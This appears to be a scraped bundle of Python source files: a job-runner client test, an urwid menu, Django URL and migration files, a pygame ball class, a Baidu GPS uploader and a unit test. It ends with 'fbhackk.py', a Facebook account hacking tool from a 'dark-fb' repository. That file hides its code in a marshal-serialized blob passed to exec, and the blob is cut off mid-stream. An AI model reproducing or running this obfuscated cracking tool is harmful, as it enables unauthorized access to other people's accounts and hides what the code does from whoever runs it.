print client.info()
client.start(2)
print client.info()
# Stop, run a one-off command, and unregister the looping job.
client.stop(2)
client.run('echo "hello"')
client.unregister(2)
print client.info()
# Group operations: register several commands under 'group1'.
client.register('echo "1"', 'group1')
client.register('echo "2"', 'group1')
client.register('echo "3"', 'group1')
client.register('echo "4"', 'group1')
client.register('echo "5"', 'group1')
client.register('echo "6"', 'group1')
client.register('echo "7"', 'group1')
print client.info()
client.start_group('group1')
# Members added after a group start should be picked up on the next start.
client.register('echo "8"', 'group1')
client.register('echo "9"', 'group1')
client.stop_group('group1')
client.start_group('group1')
print client.info()
# Remote file reads: a byte range and a tail.
print client.read('README.md', 0, 20)
print client.read_end('README.md', 20)
# Command that forks background subshells; verify stop() reaps them.
cid = client.register(r'for i in `seq 4`; do (while true; do echo $i; done &) ; done')
client.start(cid)
print client.info()
client.stop(cid)
print client.info()
|
[
"agjasimpson@gmail.com"
] |
agjasimpson@gmail.com
|
3b07e931dae87dcef3d537f0fd4eb5ac052fa0ae
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/sandbox/launcher_crap.py
|
7024adf4c0e3f981f6383ef806bc67fc73597616
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910
| 2021-08-13T15:19:48
| 2021-08-13T15:19:48
| 33,029,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,405
|
py
|
import urwid
palette = [('header', 'white', 'black'),
('reveal focus', 'black', 'dark cyan', 'standout')]
menu = {"121f02, 200Hz": 'do 121f02, 200Hz',
"121f03, 200Hz": 'do 121f03, 200Hz',
"121f04, 200Hz": 'do 121f04, 200Hz'}
items = [urwid.Text(k) for k in menu.keys()]
content = urwid.SimpleListWalker([urwid.AttrMap(w, None, 'reveal focus') for w in items])
listbox = urwid.ListBox(content)
show_key = urwid.Text("Press any key", wrap='clip')
head = urwid.AttrMap(show_key, 'header')
top = urwid.Frame(listbox, head)
def show_all_input(input, raw):
    """Input filter: echo every pending key event in the header widget and
    pass the events through unchanged so normal handling continues."""
    pressed = " ".join(str(key) for key in input)
    show_key.set_text("Pressed: " + pressed)
    return input
def exit_on_cr(input):
    """Unhandled-input hook: 'q'/'Q' aborts the program, up/down move the
    menu focus (down wraps to the top), Enter exits the main loop so the
    current selection can be read afterwards."""
    if input in ('q', 'Q'):
        raise SystemExit
    elif input == 'up':
        focus_widget, idx = listbox.get_focus()
        # Clamp at the first item (no wrap when moving up).
        if idx > 0:
            idx = idx-1
        listbox.set_focus(idx)
    elif input == 'down':
        focus_widget, idx = listbox.get_focus()
        idx = idx+1
        # Wrap from the last menu item back to the first.
        if idx > len(items)-1:
            idx = 0
        listbox.set_focus(idx)
    elif input == 'enter':
        raise urwid.ExitMainLoop()
def out(s):
    """Debug helper: render *s* in the header text widget."""
    text = str(s)
    show_key.set_text(text)
loop = urwid.MainLoop(top, palette, input_filter=show_all_input, unhandled_input=exit_on_cr)
loop.run()
print(menu[items[listbox.get_focus()[1]].get_text()[0]])
|
[
"pims@mimsy.tsc.grc.nasa.gov"
] |
pims@mimsy.tsc.grc.nasa.gov
|
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
| 2020-06-13T10:35:36.663668
| 2017-01-06T09:01:42
| 2017-01-06T09:01:42
| 75,392,559
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Route the admin site, the landing page, and the two app URLconfs.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^$',views.index_view),
    url(r'^watres/',include(watres_url)),
    url(r'^watstat/',include(watstat_url)),
]
# Development only: serve user-uploaded media and static assets directly
# from Django (production should delegate this to the web server).
if settings.DEBUG:
    if settings.MEDIA_ROOT:
        urlpatterns += static(settings.MEDIA_URL,
                              document_root=settings.MEDIA_ROOT)
    urlpatterns += staticfiles_urlpatterns()
|
[
"aliaksandr.pakhomau@gmail.com"
] |
aliaksandr.pakhomau@gmail.com
|
7f168e5086d999df72156adf6973e55195c755a1
|
42a41febceba5e1ae9e410a1b07868e4e4955af1
|
/NomticketDjangoAPP/core/migrations/0019_empleado_nombreusuario.py
|
9efce0188efd1b5f211e6eb513cb6315b6e46642
|
[] |
no_license
|
ignacio1985/NomTicket_Django
|
f06fff185a3e15bb7b8d28c9dfa34000c2eb8d37
|
38600a89c4219952f3ff4fbac7b92fc7b00b3920
|
refs/heads/main
| 2023-04-09T07:35:48.448970
| 2021-04-23T03:16:44
| 2021-04-23T03:16:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
# Generated by Django 3.1.2 on 2021-04-18 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add the unique `nombreUsuario` (username)
    CharField to the `empleado` model."""
    dependencies = [
        ('CORE', '0018_auto_20210418_1354'),
    ]
    operations = [
        migrations.AddField(
            model_name='empleado',
            name='nombreUsuario',
            # default=0 back-fills existing rows once; preserve_default=False
            # drops it from the final field definition.
            field=models.CharField(default=0, max_length=30, unique=True, verbose_name='Nombre de usuario'),
            preserve_default=False,
        ),
    ]
|
[
"williams.parra.parra@gmail.com"
] |
williams.parra.parra@gmail.com
|
9579a5ea7fad7a79327c9acb00f549bdbc62ea29
|
6b9ee9e92d0c0075b7098f43c7b0cd3cd49b4f63
|
/ball.py
|
ab81587f8faf0ae9f6f2ccec3ddecc81faaef82e
|
[] |
no_license
|
dohyunmoo/Bouncing-Balls
|
429c5f9c6adf3afbb958ce858f962f221c8c9f35
|
5dc081a7a6b54bf18d360a984f9c30f9141d2829
|
refs/heads/main
| 2023-02-17T21:52:48.607727
| 2021-01-08T13:18:42
| 2021-01-08T13:18:42
| 327,908,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,177
|
py
|
import pygame
import random
pygame.init()
class Ball:
    """A 2-D bouncing ball for pygame with per-frame gravity, horizontal
    friction, wall bounces, and click-applied impulses.

    Note the naming: `vx` holds the *friction* magnitude applied to the
    horizontal speed each frame, and `vy` holds the *weight* (gravity)
    added to the vertical speed each frame.
    """
    def __init__(self, radius, color, startingx, startingy, friction, weight):
        self.radius = radius
        self.diameter = radius*2
        self.color = color
        self.x = startingx
        self.y = startingy
        self.vx = friction
        self.vy = weight
        # Current velocity; starts at rest.
        self.yspeed = 0
        self.xspeed = 0
    def draw(self, win, width, height):
        """Advance one physics frame and draw the ball onto *win*."""
        minimumx = self.radius
        maximumx = width - self.radius
        minimumy = self.radius
        maximumy = height - self.radius
        # Apply friction toward zero on any nonzero horizontal speed.
        if self.xspeed >= 0 and self.xspeed != 0:
            self.xspeed -= self.vx
        elif self.xspeed < 0 and self.xspeed != 0:
            self.xspeed += self.vx
        self.x += self.xspeed
        # Gravity accelerates the ball downward every frame.
        self.yspeed += self.vy
        self.y += self.yspeed
        self.collision(width, height, minimumx, maximumx, minimumy, maximumy)
        # Clamp to the right/bottom walls after the bounce handling.
        if self.x >= maximumx:
            self.x = maximumx
        if self.y >= maximumy:
            self.y = maximumy
        pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
    def collision(self, width, height, xmin, xmax, ymin, ymax):
        """Reverse velocity on wall contact and re-apply friction/gravity.

        NOTE(review): the `elif` means a corner hit handles only the x
        bounce that frame, never both axes -- confirm this is intended.
        """
        if self.x <= xmin or self.x >= xmax:
            self.xspeed *= -1
            if self.xspeed >= 0 and self.xspeed != 0:
                self.xspeed -= self.vx
            elif self.xspeed < 0 and self.xspeed != 0:
                self.xspeed += self.vx
            self.x += self.xspeed
        elif self.y >= ymax:
            self.yspeed *= -1
            self.yspeed += self.vy
            self.y += self.yspeed
    def addForce(self, pos):
        """If *pos* (mouse click) lands in the ball's bounding box, kick the
        ball with a random impulse away from its current motion direction."""
        if (pos[0] <= self.x + self.radius and pos[0] >= self.x - self.radius) and (pos[1] <= self.y + self.radius and pos[1] >= self.y - self.radius):
            if self.xspeed <= 0:
                self.xspeed -= random.randint(5,10)
            else:
                self.xspeed += random.randint(5,10)
            if self.yspeed <= 0:
                self.yspeed -= random.randint(10,20)
            else:
                self.yspeed += random.randint(10,20)
|
[
"noreply@github.com"
] |
dohyunmoo.noreply@github.com
|
1eba989f3c48ca9bd2b7d760fa77a54a3143f1b6
|
39262b161d4d8eb290ed1a013a23a33d45be533b
|
/package/gpsuploader.py
|
eb18c63592ba52d8d5c8d45104bd90f6d19e865d
|
[] |
no_license
|
watermelonharry/socket_func_pyqt
|
be9394105f5cf7c442479c04b0ac18c2a05c3605
|
bedbc5d3946a49eced472fcdea8cc70d727ec0ab
|
refs/heads/master
| 2021-01-16T21:29:17.226298
| 2017-07-27T12:24:22
| 2017-07-27T12:24:22
| 59,997,128
| 1
| 0
| null | 2016-06-04T02:44:53
| 2016-05-30T09:19:47
|
Python
|
UTF-8
|
Python
| false
| false
| 5,459
|
py
|
# -*- coding:UTF-8 -*-
import time
from PyQt4.QtCore import QThread, QMutex, QMutexLocker
import threading
import requests, os
"""
基于百度鹰眼api:http://lbsyun.baidu.com/index.php?title=yingyan/api/track
"""
##config file path
CONFIG_PATH = '/'.join(os.getcwd().split('\\')) + '/websrc/gps_config.dat'
CONFIG_URL = 'http://api.map.baidu.com/trace/v2/track/addpoint'
def time_to_unix(time_str):
    """Convert a 'year month day hour minute sec' string to a UNIX timestamp.

    :param time_str: space-separated decimal fields, e.g. '2020 1 2 3 4 5'
    :return: int(UNIX_TIMESTAMP) in local time, or None if parsing fails
    """
    try:
        fields = time.strptime(time_str, '%Y %m %d %H %M %S')
        return int(time.mktime(fields))
    except Exception:
        return None
def unix_to_time(unix_str):
    """Render a UNIX timestamp as 'year month day hour minute sec' in decimal.

    :param unix_str: timestamp as int or numeric string
    :return: space-joined local-time fields as a str, or None on bad input
    """
    try:
        fields = time.localtime(int(unix_str))[:6]
        return ' '.join(str(field) for field in fields)
    except Exception:
        return None
def current_unix():
    """Return the current local time as an int UNIX timestamp, or None on error."""
    try:
        return int(time.mktime(time.localtime()))
    except Exception:
        return None
#class GpsUploader(threading.Thread):
class GpsUploader(QThread):
    """Background uploader that pushes buffered GPS points to Baidu Yingyan.

    Points are queued with add_point() and flushed to the track/addpoint
    endpoint when the thread runs.  Access to the queue is serialized with
    a class-level mutex shared by all instances.
    """
    GPSMutex = QMutex()

    def __init__(self, updateMainSignal=None, recSignal=None, toPickPointSignal=None):
        """
        :param updateMainSignal: optional Qt signal used to report status text
        :param recSignal: optional Qt signal (stored for callers; unused here)
        :param toPickPointSignal: optional Qt signal (stored for callers; unused here)
        """
        super(GpsUploader, self).__init__()
        # Template of the POST payload for the addpoint API; ak/service_id/
        # entity_name are filled from the config file by get_ak().
        self.para = {
            'ak': None,
            'service_id': None,
            'latitude': None,   # double, -90.0 ~ 90.0
            'longitude': None,  # double, -180.0 ~ 180.0
            'coord_type': 1,
            'loc_time': None,   # UNIX time stamp
            'entity_name': None}
        self.get_ak()
        self.points = []
        self.updateMainSignal = updateMainSignal
        self.recSignal = recSignal
        self.toPickPointSignal = toPickPointSignal

    def add_point(self, point_tuple):
        """Queue one point for upload.

        :param point_tuple: (longitude, latitude[, unix_time]); elements may
            be str/int/double
        """
        # Lock around the shared queue; released when the block exits.
        with QMutexLocker(self.GPSMutex):
            self.points.append(point_tuple)

    def run(self):
        """Flush the queued points, reporting upload/fail/drop counts."""
        with QMutexLocker(self.GPSMutex):
            up_count = 0
            del_count = 0
            fail_count = 0
            if len(self.points) != 0:
                for point in self.points:
                    if self.set_point(long=point[0], lat=point[1]):
                        if self.upload_one_point():
                            up_count += 1
                        else:
                            fail_count += 1
                    else:
                        # Point lacked longitude/latitude -- dropped.
                        del_count += 1
                self.points = []
                self.update_main(
                    'enter-func-GpsUploader-run: ' + str(up_count) + ' uploaded, ' + str(fail_count) + ' failed, ' + str(
                        del_count) + ' deleted.')

    def update_main(self, str_arg):
        """Report status text to the main window and echo it to stdout."""
        # BUGFIX: guard the emit -- constructing the uploader without
        # updateMainSignal (as the module's __main__ does) used to raise
        # AttributeError here.
        if self.updateMainSignal is not None:
            self.updateMainSignal.emit(str_arg)
        print(str_arg)

    def get_ak(self):
        """Load ak/service_id/entity_name from CONFIG_PATH into self.para."""
        try:
            with open(CONFIG_PATH, 'r') as data:
                for line in data:
                    if ':' not in line:
                        continue  # skip malformed lines instead of aborting
                    # Split only on the first ':' so values may contain colons.
                    key, value = line.split(':', 1)
                    # BUGFIX: rstrip('\n') instead of [:-1] -- the last line of
                    # the file may not end with a newline.
                    self.para[key] = value.rstrip('\n')
            self.para['loc_time'] = current_unix()
            print(self.para)
        except Exception as e:
            # str(e) works on both Python 2 and 3 (e.message is Py2-only).
            print('error-uploader init failed:', str(e))

    def set_point(self, long=None, lat=None, time=None, coord_type=1):
        """Fill the payload with one point.

        :param long: longitude; required
        :param lat: latitude; required
        :param time: UNIX timestamp; defaults to "now", evaluated per call.
            (BUGFIX: the old default ``time=current_unix()`` was computed once
            at import time, freezing the fallback timestamp.)
        :param coord_type: Baidu coordinate-type code (default 1)
        :return: True if the point was set, False when long/lat is missing
        """
        if long is None or lat is None:
            return False
        self.para['longitude'] = long
        self.para['latitude'] = lat
        self.para['loc_time'] = current_unix() if time is None else time
        self.para['coord_type'] = coord_type
        return True

    def upload_one_point(self):
        """POST the current payload; return True when the API reports status 0."""
        reply = requests.post(CONFIG_URL, data=self.para).json()
        # BUGFIX: compare with ==, not 'is' -- identity comparison on ints is
        # an implementation detail and unreliable.
        return reply['status'] == 0
# def GtoB(self, G_lon, G_lat):
# """
# GPS坐标转换为百度坐标
# :param G_lon: GPS经度
# :param G_lat: GPS纬度
# :return: (百度经度,百度纬度) 或 None
# """
# try:
# import json
# import base64
# url = 'http://api.map.baidu.com/ag/coord/convert?from=0&to=4&x=%s&y=%s' % (str(G_lon), str(G_lat))
# source_code = requests.get(url)
# plain_text = source_code.text
# c = json.loads(plain_text)
# if c['error'] == 0:
# return (base64.decodestring(c['x']), base64.decodestring(c['y'])) # lat,lon in string type
# else:
# return None
# except Exception as e:
# print('error in GtoB:', e.message)
# return None
if __name__ == '__main__':
    # Smoke test: queue a handful of nearly-identical points and start
    # the uploader thread.
    sample_points = [
        ('120.13143165691', '30.272977524721'),
        ('120.13143165690', '30.272977524720'),
        ('120.13143165689', '30.272977524719'),
        ('120.13143165688', '30.272977524718'),
        ('120.13143165687', '30.272977524717'),
    ]
    uploader = GpsUploader()
    for point in sample_points:
        uploader.add_point(point)
    uploader.start()
|
[
"bongbongca@foxmail.com"
] |
bongbongca@foxmail.com
|
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448
| 2020-08-16T18:27:38
| 2020-08-16T18:27:38
| 185,044,621
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
    """TMC tests for the file_count exercise (line/word/character counting)."""

    @points('p02-06.1')
    def test_first(self):
        # The solution must report the known counts for the fixture file.
        l, w, c = file_count("src/test.txt")
        self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
        self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
        self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")

    @points('p02-06.1')
    def test_calls(self):
        # The file must be opened exactly once.
        with patch('builtins.open', side_effect=open) as o:
            file_count("src/test.txt")
        o.assert_called_once()

    @points('p02-06.2')
    def test_main(self):
        # BUGFIX: copy sys.argv instead of aliasing it.  The old
        # ``orig_argv = sys.argv`` bound the same list object, so the slice
        # assignment below mutated "orig_argv" too and the final restore was
        # a no-op, leaking the fake arguments into later tests.
        orig_argv = list(sys.argv)
        n = 7
        sys.argv[1:] = ["file%i" % i for i in range(n)]
        # Stub file_count so main() is tested in isolation; every call
        # reports zero counts.
        with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
            main()
            self.assertEqual(fc.call_count, n,
                 msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
            result = get_out().split('\n')
            for i, line in enumerate(result):
                self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
                                 msg="Wrong result on line %i!" % i)
        sys.argv = orig_argv
if __name__ == '__main__':
    # Allow running this test module directly with the standard unittest runner.
    unittest.main()
|
[
"miska.noponen@gmail.com"
] |
miska.noponen@gmail.com
|
4ae5f578d4843f3c010396030d69aa334d3cb6e3
|
3fdda7a9a8efb5c41302fe39cf8cd74c09aa2326
|
/fbhackk.py
|
dba2d05a9f3a2997c14a7edaf34c360ab584cebd
|
[] |
no_license
|
RandiSr/dark-fb
|
330809c38fe713c2d70e1571a17f400ba7e5edf5
|
0088d24c5b344fc71d8327dcf70ef1717cf224c4
|
refs/heads/master
| 2020-07-22T02:51:11.719676
| 2019-09-08T03:09:14
| 2019-09-08T03:09:14
| 207,052,986
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204,567
|
py
|
#Coder By: RandiSr
#mau Recode silahkan;v
#Team: Muslim Cyber Army
#Github: https://github.com/RandiSr
#Channel Youtube: RANDIOLOYY
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sI\x04\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x02\x00l\x0c\x00m\r\x00Z\r\x00\x01y\x10\x00d\x00\x00d\x01\x00l\x0e\x00Z\x0e\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\xd0\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x11\x00Z\x11\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\x01\x01\x01\x01\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x05\x00l\x12\x00m\x13\x00Z\x13\x00\x01d\x00\x00d\x06\x00l\x0e\x00m\x14\x00Z\x14\x00\x01e\x15\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x16\x00d\x07\x00\x83\x01\x00\x01e\x0e\x00j\x14\x00\x83\x00\x00Z\x17\x00e\x17\x00j\x18\x00e\x19\x00\x83\x01\x00\x01e\x17\x00j\x1a\x00e\x0e\x00j\x1b\x00j\x1c\x00\x83\x00\x00d\x08\x00d\t\x00\x83\x01\x01\x01dO\x00g\x01\x00e\x17\x00_\x1d\x00d\x0c\x00\x84\x00\x00Z\x1e\x00d\r\x00\x84\x00\x00Z\x1f\x00d\x0e\x00\x84\x00\x00Z 
\x00d\x0f\x00\x84\x00\x00Z!\x00d\x10\x00Z"\x00d\x11\x00\x84\x00\x00Z#\x00d\x12\x00a$\x00g\x00\x00Z%\x00g\x00\x00a&\x00g\x00\x00a\'\x00g\x00\x00a(\x00g\x00\x00a)\x00g\x00\x00Z*\x00g\x00\x00Z+\x00g\x00\x00Z,\x00g\x00\x00Z-\x00g\x00\x00Z.\x00g\x00\x00Z/\x00g\x00\x00Z0\x00g\x00\x00Z1\x00g\x00\x00Z2\x00g\x00\x00Z3\x00g\x00\x00Z4\x00g\x00\x00Z5\x00g\x00\x00Z6\x00g\x00\x00Z7\x00g\x00\x00Z8\x00d\x13\x00Z9\x00d\x14\x00Z:\x00d\x15\x00Z;\x00d\x16\x00Z<\x00d\x17\x00\x84\x00\x00Z=\x00d\x18\x00\x84\x00\x00Z>\x00d\x19\x00\x84\x00\x00Z?\x00d\x1a\x00\x84\x00\x00Z@\x00d\x1b\x00\x84\x00\x00ZA\x00d\x1c\x00\x84\x00\x00ZB\x00d\x1d\x00\x84\x00\x00ZC\x00d\x1e\x00\x84\x00\x00ZD\x00d\x1f\x00\x84\x00\x00ZE\x00d \x00\x84\x00\x00ZF\x00d!\x00\x84\x00\x00ZG\x00d"\x00\x84\x00\x00ZH\x00d#\x00\x84\x00\x00ZI\x00d$\x00\x84\x00\x00ZJ\x00d%\x00\x84\x00\x00ZK\x00d&\x00\x84\x00\x00ZL\x00d\'\x00\x84\x00\x00ZM\x00d(\x00\x84\x00\x00ZN\x00d)\x00\x84\x00\x00ZO\x00d*\x00\x84\x00\x00ZP\x00d+\x00\x84\x00\x00ZQ\x00d,\x00\x84\x00\x00ZR\x00d-\x00\x84\x00\x00ZS\x00d.\x00\x84\x00\x00ZT\x00d/\x00\x84\x00\x00ZU\x00d0\x00\x84\x00\x00ZV\x00d1\x00\x84\x00\x00ZW\x00d2\x00\x84\x00\x00ZX\x00d3\x00\x84\x00\x00ZY\x00d4\x00\x84\x00\x00ZZ\x00d5\x00\x84\x00\x00Z[\x00d6\x00\x84\x00\x00Z\\\x00d7\x00\x84\x00\x00Z]\x00d8\x00\x84\x00\x00Z^\x00d9\x00\x84\x00\x00Z_\x00d:\x00\x84\x00\x00Z`\x00d;\x00\x84\x00\x00Za\x00d<\x00\x84\x00\x00Zb\x00d=\x00\x84\x00\x00Zc\x00d>\x00\x84\x00\x00Zd\x00d?\x00\x84\x00\x00Ze\x00d@\x00\x84\x00\x00Zf\x00dA\x00\x84\x00\x00Zg\x00dB\x00\x84\x00\x00Zh\x00dC\x00\x84\x00\x00Zi\x00dD\x00\x84\x00\x00Zj\x00dE\x00\x84\x00\x00Zk\x00dF\x00\x84\x00\x00Zl\x00dG\x00\x84\x00\x00Zm\x00dH\x00\x84\x00\x00Zn\x00dI\x00\x84\x00\x00Zo\x00dJ\x00\x84\x00\x00Zp\x00dK\x00\x84\x00\x00Zq\x00dL\x00\x84\x00\x00Zr\x00dM\x00\x84\x00\x00Zs\x00et\x00dN\x00\x84\x01\x00Zu\x00e=\x00\x83\x00\x00\x01d\x01\x00S(P\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x16\x00\x00\x00pip2 install mechanizes\x15\x00\x00\x00pip2 
install requests(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0f\x00\x00\x00\x1b[1;91m[!] Exit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x06\x00\x00\x00keluar\x1f\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00|\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x00\x00j\x01\x00d\x04\x00t\x02\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x03\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00mhkbpcPt\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x04\x00\x00\x00t\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00acak$\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x00\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x00\x00q\r\x00W|\x00\x00d\x05\x007}\x00\x00|\x00\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x00\x00t\x03\x00j\x04\x00j\x05\x00|\x00\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x
00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x04\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x13\x00\x00\x00t\x01\x00\x00\x00j(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x0f\x00\x00\x00+\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xb9?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00jalan5\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xec\x03\x00\x00\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88 \n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc _-_-- 